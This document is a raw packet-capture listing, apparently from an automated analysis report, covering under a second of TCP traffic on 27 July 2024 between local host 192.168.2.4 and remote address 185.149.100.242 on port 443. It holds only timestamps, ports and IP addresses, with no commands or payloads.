Jul 27, 2024 07:44:07.616964102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.655486107 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655539989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655559063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.655572891 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655585051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.655610085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.655811071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655853987 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655864954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.655879021 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.655920982 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.656068087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.656112909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.656116009 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.656136036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.656162977 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.656184912 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.661149979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.661191940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.661232948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.661242962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.661267996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.661276102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.665265083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.665307045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.665318012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.665328979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.665353060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.665371895 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703161955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703201056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703229904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703243971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703277111 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703286886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703540087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703583002 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703598976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703607082 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703624964 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703639984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703936100 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703977108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.703990936 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.703999996 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.704014063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.704027891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743160963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743202925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743226051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743243933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743266106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743284941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743377924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743418932 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743437052 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743443966 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743458986 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743478060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743592978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743635893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743643999 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743659973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.743685961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.743724108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.748848915 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.748891115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.748908997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.748918056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.748944044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.748963118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.753005028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.753051043 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.753067017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.753078938 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.753103018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.753118992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791146994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791193008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791233063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791245937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791280985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791299105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791358948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791399956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791418076 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791424990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791455030 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791469097 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791637897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791697025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791712046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791718006 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.791731119 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.791755915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845616102 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845663071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845695019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845704079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845737934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845748901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845820904 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845864058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845885038 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845890999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.845911980 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.845932961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846093893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846134901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846158028 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846163034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846188068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846204996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846297026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846335888 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846362114 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846368074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846395969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846415043 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846570969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846611977 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846637011 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846643925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.846671104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.846689939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.848086119 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.878813982 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.878859997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.878885984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.878895998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.878915071 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.878937006 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879096031 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879137993 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879153013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879159927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879182100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879190922 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879282951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879328012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879331112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879354000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.879379988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.879389048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933409929 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933451891 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933478117 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933485031 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933511019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933531046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933612108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933653116 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933667898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933674097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933711052 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933864117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933908939 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933923006 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933928967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.933962107 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.933973074 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934104919 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934146881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934160948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934166908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934195042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934202909 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934326887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934367895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934381962 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934387922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.934422016 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.934434891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.935806036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966516018 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966557026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966598034 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966603041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966625929 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966639042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966734886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966789007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966806889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966814041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966840982 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966851950 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.966939926 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966983080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.966999054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.967006922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.967032909 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.967045069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022269964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022336006 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022516012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022536039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022559881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022742987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022742987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022742987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022783041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022840023 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022866964 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022893906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.022932053 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.022978067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023001909 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023009062 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023034096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023050070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023132086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023191929 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023197889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023260117 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023310900 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023350954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023361921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023379087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.023405075 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.023413897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.025190115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054316998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054363012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054497004 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054497004 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054517984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054649115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054740906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054740906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054800034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054848909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054871082 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.054878950 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.054923058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.055032015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.055032015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.055032015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.055053949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.055098057 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310447931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310507059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310681105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310681105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310702085 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310729980 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310749054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310755968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310781956 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310789108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310801983 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310802937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310828924 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310851097 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310893059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310954094 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.310966969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.310985088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311013937 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311022997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311199903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311239004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311264992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311270952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311290979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311311007 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311331034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311376095 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311389923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311397076 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311429024 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311439037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311512947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311559916 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311574936 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311583996 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311598063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311621904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311827898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311872005 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311888933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311896086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.311920881 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.311933041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312064886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312108040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312125921 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312133074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312156916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312165976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312371969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312418938 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312436104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312443972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312458992 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312477112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312649965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312695026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312720060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312725067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312742949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312762022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312870979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312910080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312927961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312933922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.312944889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312964916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.312983036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313075066 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313122034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313139915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313147068 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313158035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313177109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313188076 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313302994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313348055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313364029 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313369989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313396931 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313405991 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313512087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313555002 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313608885 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313616037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313734055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313780069 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313812017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313827038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.313836098 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.313958883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314001083 CEST	62252	443	192.168.2.4	185.149.100.242
